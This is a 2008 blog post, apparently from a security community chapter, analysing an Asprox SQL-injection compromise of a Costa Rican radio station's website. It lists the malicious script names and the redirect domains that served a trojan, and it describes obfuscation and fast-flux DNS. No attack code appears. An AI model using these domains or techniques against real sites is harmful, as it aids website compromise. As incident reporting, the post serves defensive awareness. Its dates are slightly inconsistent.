HomeBlogsjbogarin's blog

Radio Asproxing its way to Costa Rica's clients

Sun, 06/07/2008 - 13:03 — jbogarin

In recent days it has come to our chapter attention that Asprox has infected a well known Costa Rican radio broadcasting company site.

The first infection appeared during June, 14th on the verge of the Costa Rican soccer team match against Grenada's for FIFA's 2010 World Championship. The match couldn't be televised so online radio service was at a peak, which lead to think that the attack could be targeted and not just coincidence.

An SQL injection of b.jss script on the exe94.com domain that redirect to datajto.com and later to adsitelo.com which at the end served the trojan, load.php. An obvious technique used in these attacks was the javascript obfuscation during the redirections and execution.

After analyzing the trojan's infection the affected files were that of a german installation of a Windows XP, so the thesis of a targeted attacked were wrong.

An email was sent to the company advising to take actions against this infection, which they did statically programming the vulnerable part.

20 days later, July 4th the same radio company was serving the new ngg.js scripts for sites:

  • ucomddv.com
  • upcomd.com
  • adwadb.mobi

The scripts redirected to several sites and a cgi script that send the clients to msn.com.

Both attacks used SQL Injection and single fast-flux tactics to further spread with A records changing every 10 minutes but the authoritative DNS' keeping constant over time.

It is important to notice that the first round of attack was very straight forward in the domains it served, only one was on the main page and it jumped to two others to reach it's final destination. However this new one served up to three domains on the vulnerable page and each one of them served different domains and not always the same domain after that. Also, it incorporated better browser sensing algorithms.

SQL injections are hard and heavy right now, infecting sites all over the world, not just developed countries sites. It is taking advantage of careless dynamic programming on several ASP sites.

More information about this can be seen at a great blog of Dancho Danchev and in case you are victim of this disease, medication can be found here.